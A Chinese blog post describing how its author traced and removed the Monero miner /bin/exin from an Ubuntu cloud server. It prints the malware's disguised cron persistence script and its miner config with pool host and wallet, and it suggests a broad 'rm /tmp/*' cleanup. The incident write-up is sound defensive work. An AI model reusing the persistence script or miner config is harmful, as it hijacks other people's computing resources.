Linux 挖矿病毒 /bin/exin
系统
作者:Billy.Wang
腾讯云主机
Ubuntu 18.04
$ top
排查过程
找到运行的进程,确定进程位置为 /bin/exin
$ ps -a |grep 进程号
删除程序,直接删除不成功,必须先执行 chattr -ia exin
$ sudo chattr -ia /bin/exin
$ sudo rm -rf /bin/exin
过了一会,又死灰复燃,晕~
排查 定时任务,的确有异常!
$ cat /var/spool/cron/root
MAILTO=''
*/19 * * * * /etc/cron.hourly/agetty >/dev/null 2>&1
$ cat /etc/cron.hourly/agetty
#!/bin/sh
if [ "$(pgrep -f /bin/exin|wc -l)" -eq 0 ]; then
nohup /bin/exin >/dev/null 2>&1 &
fi
删除定时任务,也许可以解决了吧?
$ sudo rm /etc/cron.hourly/agetty
$ sudo rm /var/spool/cron/root
重启系统后,问题依旧,逛晕~~~~,继续排查 /bin 目录,发现有个config.json
$ sudo vi /bin/config.json
{
"av": 0,
"background": true,
"cpu-affinity": null,
"cpu-priority": 5,
"donate-level": 1,
"log-file": null,
"max-cpu-usage": 100,
"print-time": 30,
"retries": 3,
"retry-pause": 10,
"safe": false,
"threads": null,
"pools": [
{
"url": "epel-mirror.duckdns.org:443",
"user": "4AncaLQuvBThfLuhdhaKh1Pr3ix2547SKYLCQnjJVjNw5mciYYZ7zpeMiD9TS4JYFGBHuyESm9ZEpdpnkK2DMZanJ6rvj2p",
"pass": "z",
"algo": "rx/0",
"coin": "monero",
"rig-id": null,
"nicehash": false,
"keepalive": false,
"variant": -1,
"enabled": true,
"tls": true,
"tls-fingerprint": null
}
],
"api": {
"port": 0,
"access-token": null,
"worker-id": null
}
}
删除 config.json,重启后终于解决了。
$ sudo chattr -ia /bin/config.json
$ sudo rm /bin/config.json
查看/tmp 目录,如果有相关文件,一并删除。
$ sudo rm /tmp/*
汇总:解决方法,需要删除的文件
删除程序,直接删除不成功,必须先执行 chattr -ia exin$ sudo chattr -ia /bin/config.json
$ sudo rm /bin/config.json
$ sudo chattr -ia /bin/exin
$ sudo rm -rf exin
$ sudo rm /etc/cron.hourly/agetty
$ sudo rm /var/spool/cron/root
$ sudo rm /tmp/*
其他问题
原因:未明确该应用如何被安装到了主机上
可能是因为下载其他镜像文件时,病毒被一并安装。
作者:Billy.Wang
相关文章
Adeline
2020-07-08
Meta
2023-07-22
Samira
2023-07-22
Ursula
2023-07-22
Radinka
2023-07-22
Gella
2023-07-22
Miette
2023-07-22
Zandra
2023-07-22
Kara
2023-07-22
Irma
2023-07-22
Kande
2023-08-08
Tricia
2023-08-08
Karli
2023-08-08
Ula
2023-08-08
Dulcea
2023-08-08
Malina
2023-08-08
Fawn
2023-08-08
Rose
2023-08-08